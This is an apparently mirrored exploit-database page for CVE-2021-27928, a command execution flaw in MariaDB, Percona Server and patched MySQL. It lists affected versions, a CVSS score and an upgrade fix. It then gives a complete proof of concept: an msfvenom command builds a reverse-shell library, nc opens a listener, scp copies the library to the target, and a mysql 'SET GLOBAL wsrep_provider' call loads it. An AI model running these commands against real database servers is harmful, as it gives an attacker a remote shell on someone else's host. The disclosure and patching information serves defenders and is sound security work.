MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution

vendor:

MariaDB, Percona Server, MySQL

by:

Central InfoSec

7.2

CVSS

HIGH

OS Command Execution

CWE

Product Name: MariaDB, Percona Server, MySQL

Affected Version From: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL

Affected Version To: N/A

Patch Exists: YES

Related CWE: CVE-2021-27928

CPE: N/A

Other Scripts: N/A

Platforms Tested: Linux

2021

MariaDB 10.2 /MySQL – ‘wsrep_provider’ OS Command Execution

An OS command execution vulnerability exists in MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL. An attacker can exploit this vulnerability by creating a reverse shell payload, starting a listener, copying the payload to the target machine, and executing the payload.

Mitigation:

Upgrade to MariaDB 10.2.37, 10.3.28, 10.4.18, and 10.5.9; Percona Server 2021-03-03; and the wsrep patch 2021-03-03 for MySQL.

Source

Exploit-DB raw data:

# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
# Date: 03/18/2021
# Exploit Author: Central InfoSec
# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
# Tested on: Linux
# CVE : CVE-2021-27928

# Proof of Concept:

# Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so

# Start a listener
nc -lvp <port>

# Copy the payload to the target machine (In this example, SCP/SSH is used)
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so

# Execute the payload
mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'